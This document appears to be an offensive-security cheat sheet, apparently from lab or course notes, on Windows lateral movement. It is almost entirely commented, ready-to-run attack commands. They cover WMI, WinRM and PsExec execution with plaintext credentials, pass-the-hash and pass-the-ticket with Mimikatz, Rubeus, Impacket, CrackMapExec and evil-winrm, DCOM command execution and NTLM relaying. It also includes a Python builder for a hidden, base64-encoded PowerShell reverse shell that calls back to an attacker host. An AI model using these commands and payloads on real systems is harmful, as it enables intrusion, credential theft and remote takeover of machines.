Lateral Movement
WMI / WinRM
# WMI 135 : Remote Procedure Calls (RPC)
# We need the credentials of a member of the Administrators local group
# Creates a process (here "calc") on the remote host; this is the same
# Win32_Process Create call that the PowerShell variant below makes over DCOM.
# The password is given in clear text on the command line, so it is visible in
# process listings and command-line logging on the host that runs wmic.
wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"
# with Powershell we can use it to get rev shell after base64 encoding
# Builds a PSCredential, opens a CIM session over DCOM and invokes
# Win32_Process.Create on 192.168.189.73. $command is only a placeholder
# ('calc'); the encoded command built by the Python snippet further down is what
# would replace it. PowerShell variable names are case-insensitive, so
# $Options/$options and $Session/$session refer to the same variables.
$username = 'jen'; $password = 'Nexus123!'; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; $options = New-CimSessionOption -Protocol DCOM; $session = New-Cimsession -ComputerName 192.168.189.73 -Credential $credential -SessionOption $Options; $command = 'calc'; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
# WinRM 5986,5985 : Microsoft Windows Remote Management
# We need a domain user with Administrators or Remote Management priv
# Runs "cmd /c hostname & whoami" on files04 over WinRM. As with wmic above, the
# password is on the command line and ends up in process/command-line logs.
winrs -r:files04 -u:jen -p:Nexus123! "cmd /c hostname & whoami"
# Powershell
# Creates a remoting session to 192.168.189.73 with explicit credentials. The
# session is not entered here; Enter-PSSession <Id> (next line on the page) is
# what attaches to it.
$username = 'jen'; $password = 'Nexus123!'; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; New-PSSession -ComputerName 192.168.189.73 -Credential $credential;
Enter-PSSession 1
import sys
import base64
# PowerShell TCP reverse-shell one-liner (connects to 192.168.118.2:443); this
# is the script block that gets encoded for "powershell -e".
payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.118.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
# -e expects Base64 of the UTF-16LE bytes. str.encode('utf16') prepends a
# 2-byte byte-order mark, which the [2:] slice strips before encoding.
# (The "import sys" on the preceding line is unused by this snippet.)
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print(cmd)
PsExec
# We need a user in the local Administrators group; the ADMIN$ share must be available and File and Printer Sharing must be turned on
.\PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd
Pass the Hash (PtH)
# Pass the Hash from Windows Using Mimikatz:
# privilege::debug requests the debug privilege; sekurlsa::pth then starts
# cmd.exe under a logon session that uses the supplied NT hash (/rc4) in place
# of a password. <user>, <hash> and <domain> are placeholders.
mimikatz.exe privilege::debug "sekurlsa::pth /user:<user> /rc4:<hash> /domain:<domain> /run:cmd.exe" exit
# Pass the Hash with PowerShell Invoke-TheHash (Windows)
Import-Module .\Invoke-TheHash.psd1
# Runs "whoami" on <IP> over SMB, authenticating with the NT hash instead of a
# password. <IP>, <domain>, <user> and <hash> are placeholders.
Invoke-SMBExec -Target <IP> -Domain <domain> -Username <user> -Hash <hash> -Command "whoami" -Verbose
# Pass the Hash with Impacket (Linux) / impacket-wmiexec impacket-atexec impacket-smbexec
# -hashes takes LM:NT; the LM half is left empty here, only the NT hash is given.
impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
# Pass the Hash with CrackMapExec (Linux)
# Tries the hash against every host in 172.16.1.0/24 and runs "whoami" where it
# is accepted. NOTE(review): "-d ." presumably selects a local (non-domain)
# logon — confirm against the CrackMapExec docs.
crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami
# Pass the Hash with evil-winrm (Linux)
# Interactive WinRM session on 10.129.201.126 using the NT hash (-H).
evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453
# Enable Restricted Admin Mode to Allow PtH with RDP
# Writes DisableRestrictedAdmin=0 under HKLM\System\CurrentControlSet\Control\Lsa
# on the target. The value name is negated: 0 means Restricted Admin mode is ON.
# This is a persistent configuration change to the host (HKLM write, needs admin
# rights there) rather than a one-off command, so it leaves a lasting trace.
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
# Pass the Hash with RDP (Linux)
xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B
Pass the Key / OverPass the Hash
# Mimikatz - Pass the Key/OverPass the Hash
# Same sekurlsa::pth as in the PtH section, but launching powershell. /ntlm is
# the NT hash, which also serves as the RC4 Kerberos key, so the spawned
# session can go on to obtain a TGT (see "Generate a TGT" below).
sekurlsa::pth /domain:domain.htb /user:user /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f /run:powershell
# Generate a TGT by authenticating to a network share. This is the step that
# converts the NTLM hash into a Kerberos TGT.
net use \\files04
klist # Listing Kerberos tickets; the new TGT should appear here
.\PsExec.exe \\files04 cmd # Opening remote connection using Kerberos auth
# Mimikatz - Extract Kerberos Keys
# Lists the Kerberos keys cached in LSASS. The aes256 value shown here is what
# the Rubeus asktgt /aes256 command below takes as input.
sekurlsa::ekeys
# Rubeus - Pass the Key/OverPass the Hash
Rubeus.exe asktgt /domain:domain.htb /user:user /aes256:b21c99f..SNIP..da3fe60 /nowrap
Pass the Ticket (PtT)
# Pass the Ticket : export a TGS ticket of a user and use it to authenticate to a specific service
# Mimikatz - Export Tickets
# Writes the cached tickets to .kirbi files (the files used by ptt below).
sekurlsa::tickets /export
# Rubeus - Export Tickets
# Prints the tickets as Base64; /nowrap keeps each blob on a single line.
Rubeus.exe dump /nowrap
# Rubeus Pass the Ticket
# Requests a TGT with the user's RC4 key; /ptt loads the result directly into
# the current logon session instead of only printing it.
Rubeus.exe asktgt /domain:domain.htb /user:user /rc4:3f74a71..SNIP..2f077b1ce50f /ptt
# Another way is to import the ticket into the current session using the .kirbi
Rubeus.exe ptt /ticket:RND-user@krbtgt-domain.htb.kirbi
# Convert .kirbi to Base64 Format
# PowerShell: read the ticket file and print it Base64-encoded so it can be
# passed inline to Rubeus instead of as a file.
[Convert]::ToBase64String([IO.File]::ReadAllBytes("RND-user@krbtgt-domain.htb.kirbi"))
# Pass the Ticket - Base64 Format
# Same ptt as above, but /ticket takes the Base64 blob (truncated here, <SNIP>).
Rubeus.exe ptt /ticket:doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA/VhggPxMIzSrk/gHuER2XRLdV/<SNIP>
# Mimikatz - Pass the Ticket
# kerberos::ptt loads the .kirbi into the current logon session; after leaving
# mimikatz the ticket is used transparently, e.g. by the dir of the DC's C$ share.
kerberos::ptt "C:\path\Mimikatz\RND-user@krbtgt-domain.htb.kirbi"
exit
dir \\DC01.inlanefreight.htb\c$
# Mimikatz - PowerShell Remoting - Pass the Ticket
# Same import; a powershell started afterwards inherits the injected ticket and
# can use it for Enter-PSSession (next line on the page).
kerberos::ptt "C:\path\Mimikatz\RND-user@krbtgt-domain.htb.kirbi"
exit
powershell
Enter-PSSession -ComputerName DC01
DCOM
# we need RPC port 135 and local administrator access
# Instantiates the MMC20.Application COM object on 192.168.163.73 over DCOM;
# the object's ExecuteShellCommand method (next line) is what runs the command.
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.163.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e base64_revshell_encode","7")
Relaying Net-NTLMv2
# Start ntlmrelayx for a relay attack targeting 192.168.0.2, using the www.revshells.com "PowerShell #3 (Base64)" payload as the command
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.0.2 -c "powershell -e JABjAGwAaQBlAG4AdA..."